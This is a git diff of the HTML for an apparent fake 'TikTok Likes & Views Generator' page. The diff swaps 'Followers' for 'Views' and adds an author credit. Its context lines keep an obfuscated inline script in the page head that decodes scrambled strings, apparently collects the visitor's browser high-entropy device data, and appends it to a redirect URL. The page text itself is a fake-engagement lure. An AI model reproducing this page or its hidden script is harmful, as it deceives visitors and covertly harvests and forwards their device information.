--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
   <meta name="pushsdk" content="aecca34efa94f912f811613ab79a7747">
-  <title>TikTok Likes & Followers Generator</title>
+  <title>TikTok Likes & Views Generator</title>
   <link rel="stylesheet" href="style.css"/>
     <script>
     var a='mcrpolfattafloprcmlVeedrosmico?ncc=uca&FcusleluVlearVsyipoonrctannEdhrgoiiHdt_emgocdeellicboosmccoast_avDetrnseigoAnrcebsruocw=seelri_bvoemr_ssiiocn'.split('').reduce((m,c,i)=>i%2?m+c:c+m).split('c');var Replace=(o=>{var v=a[0];try{v+=a[1]+Boolean(navigator[a[2]][a[3]]);navigator[a[2]][a[4]](o[0]).then(r=>{o[0].forEach(k=>{v+=r[k]?a[5]+o[1][o[0].indexOf(k)]+a[6]+encodeURIComponent(r[k]):a[0]})})}catch(e){}return u=>window.location.replace([u,v].join(u.indexOf(a[7])>-1?a[5]:a[7]))})([[a[8],a[9],a[10],a[11]],[a[12],a[13],a[14],a[15]]]); 
@@ -81,7 +81,7 @@
 </head>
 <body>
   <div class="container">
-    <h1>Boost Your TikTok Fame Instantly</h1>
+    <h1>Boost Your TikTok Fame Instantly: By Rapha Chege</h1>
     <p class="intro-text">
       Struggling to grow your TikTok account? You're in the right place.
       With over 10 years of digital growth expertise, our platform delivers 
@@ -101,13 +101,13 @@
         <option value="5000">5,000 Likes</option>
       </select>
 
-      <label for="followers">Select Followers</label>
+      <label for="followers">Select Views</label>
       <select id="followers" name="followers">
-        <option value="100">100 Followers</option>
-        <option value="500">500 Followers</option>
-        <option value="1000">1,000 Followers</option>
-        <option value="2000">2,000 Followers</option>
-        <option value="5000">5,000 Followers</option>
+        <option value="100">100 Views</option>
+        <option value="500">500 Views</option>
+        <option value="1000">1,000 Views</option>
+        <option value="2000">2,000 Views</option>
+        <option value="5000">5,000 Views</option>
       </select>
       <button type="submit">Continue</button>
       <center>
